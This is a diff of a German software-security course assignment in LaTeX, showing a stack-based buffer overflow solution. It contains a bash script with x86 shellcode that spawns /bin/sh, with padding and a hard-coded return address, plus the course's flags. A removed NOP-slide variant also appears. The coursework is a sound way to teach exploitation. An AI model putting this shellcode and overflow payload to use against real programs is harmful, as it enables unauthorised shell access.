Assignment 6 - Software Security - Teil 2/abgabe.tex

@@ -139,38 +139,23 @@
 
 \begin{exercise}[Stack-Based Buffer Overflow]{6}
 \begin{subexercises}
-    \item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell ausgeführt wird:\\
+\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell ausgeführt wird. Die Flag lautet \lstinline|flag{THAT_WAS_EASY_HUH}|.\\
         \begin{lstlisting}[language=Bash]
 #!/usr/bin/env sh
 
-# 28 Byte Shellcode
+# 21 Byte Shellcode
-SHELLCODE="\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
+SHELLCODE="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
 # Padding to fill:
-# - 72 Bytes to fill buff
+# - 79 Bytes to fill buff
 # - 8 Bytes to fill the local variables before buff
 # - 4 Bytes to fill the saved ebp value
-PADDING=$(printf "A%.0s" $(seq 1 84))
+PADDING=$(printf "A%.0s" $(seq 1 91))
 # Address of the start of the buff array / shellcode
 RETADDR="\x1C\xDB\xFF\xFF"
 
 printf $SHELLCODE$PADDING$RETADDR
         \end{lstlisting}
-    \item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell im Anschluss an eine NOP-Slide ausgeführt wird.:\\
+    \item Die Flag lautet \lstinline|flag{THEY_SEE_ME_SLIDIN_THEY_HATIN}|.\\
-        \begin{lstlisting}[language=Bash]
-#!/usr/bin/env sh
-
-# 28 Byte Shellcode
-SHELLCODE="\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
-# NOP-Slide to fill:
-# - 72 Bytes to fill buff
-# - 8 Bytes to fill the local variables before buff
-# - 4 Bytes to fill the saved ebp value
-PADDING=$(printf "\\\\0x90%.0s" $(seq 1 84))
-# Address of the start of the buff array / shellcode
-RETADDR="\x1C\xDB\xFF\xFF"
-
-printf $PADDING$SHELLCODE$RETADDR
-        \end{lstlisting}
 \end{subexercises}
 \end{exercise}
 \end{document}